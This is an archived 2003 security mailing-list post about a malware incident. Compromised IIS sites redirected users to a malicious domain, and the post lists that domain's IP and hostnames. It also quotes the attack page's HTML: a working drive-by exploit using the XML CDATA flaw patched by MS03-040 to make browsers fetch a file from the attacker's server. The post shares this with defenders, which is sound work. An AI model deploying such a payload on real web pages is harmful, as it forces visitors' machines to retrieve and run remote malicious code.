Security Incidents mailing list archives

RE: Proxy attackers/hijackers

From: "James C. Slora, Jr." <james.slora () phra com>
Date: Fri, 17 Oct 2003 16:45:20 -0400

Steve Carey wrote

 The autoproxy Trojan you mentioned is detected by Norton Anti-virus as
'backdoor.coreflood Trojan', per the write-up from the site you provided, but
there is another autoproxy Trojan that is not identified as a Trojan.  There is
a new site (216.247.117.225 - shows up as chinesenaming.com and wvw.goling.com
(wvw is not a misprint))that is running malicious code when users connect to it
(with ActiveX enabled).


Add wvw.goling2003.com to the list of other names for 216.247.117.225.

My users did not get to the site through spam links, they were directed there from compromised Interland (again!?) 
sites running IIS 5.0 and MicrosoftOfficeWebServer 5.0 (also really IIS 5.0). On infected sites, every page generated a 
new hit to wvw.goling2003.com 

Compromised sites were in these networks:
64.225.xx.xx
64.224.xx.xx
The infected pages have since been cleaned.

Connection to this hostname returns different data from the hostnames you listed, although it is the same IP address (I 
know this is not unusual, just trying to be clear).

http://wvw.goling2003.com
uses XML CDATA Object fixed by MS03-040 to try to force retrieval of:
http://wvw.goling2003.com:53/inf.ooo
That page currently gives a "connection refused" message. Maybe it is used to record who was vulnerable to the CDATA 
exploit. Users who visited the exploit page did not generate hits to inf.ooo, because their machines were patched, so I 
don't know if the page previously returned anything else.

Code for wvw.goling2003.com/main.html

<html><body>
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object data="http://wvw.goling2003.com:53/inf.ooo"; width=0 height=0>
]]>
</exploit>
</security>
</xml>
[/body][/html]

---------------------------------------------------------------------------
FREE Whitepaper: Better Management for Network Security

Looking for a better way to manage your IP security?
Learn how Solsoft can help you:
- Ensure robust IP security through policy-based management
- Make firewall, VPN, and NAT rules interoperable across heterogeneous
networks
- Quickly respond to network events from a central console

Download our FREE whitepaper at:
http://www.securityfocus.com/sponsor/Solsoft_incidents_031015
----------------------------------------------------------------------------

Current thread:

Proxy attackers/hijackers Jeff Kell (Oct 17)
- Re: Proxy attackers/hijackers Joe Stewart (Oct 17)
- <Possible follow-ups>
- RE: Proxy attackers/hijackers Carey, Steve T GARRISON (Oct 17)
- Proxy attackers/hijackers Thomas Willner (Oct 20)
  - Re: [Dshield] Proxy attackers/hijackers Thor Larholm (Oct 19)
- RE: Proxy attackers/hijackers James C. Slora, Jr. (Oct 20)